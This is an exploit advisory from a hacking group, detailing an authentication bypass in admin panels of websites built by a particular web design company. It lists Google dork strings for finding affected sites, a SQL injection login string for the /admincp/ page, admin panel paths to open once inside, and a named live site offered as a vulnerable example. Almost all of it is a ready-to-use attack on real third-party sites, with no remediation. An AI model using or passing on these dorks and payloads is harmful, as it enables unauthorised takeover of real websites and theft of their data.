#################################################################################################
# Exploit Title : Designed & Hosted By MWC Design England Authentication Bypass Vulnerability
# Author [ Discovered By ] : AYAR from Cyberizm Digital Security Army
# Date : 28/09/2018
# Vendor Homepage : mwcdesign.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork :
intext:''Designe & Hosted By. MWC''
intext:''Designed & Hosted By. MWC''
intext:''Design By: MWC''
# Admin Page Login Path => /admincp/
# Exploit :
Admin Username : anything' OR 'x'='x
Admin Password : anything' OR 'x'='x
# Useable Admin Control Panel URL Links =>
/admincp/mmainsections.php
/admincp/clints.php
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/settings.php
/admincp/changepass.php
#################################################################################################
# Example Vulnerable Site => losotecintl.com/admincp/
#################################################################################################
# Discovered By AYAR from Cyberizm.Org Digital Security Team
#################################################################################################
# Thanks to Cyberizm Team => KingSkrupellos ~ H4CK4L ~ The_ZiziL ~ 1hT1y@R
DARKDAYS ~ Leader Shawai ~ OrJiNaL ~ Stallk3r ~ Meczup ~ Dessy and other precious members.
#################################################################################################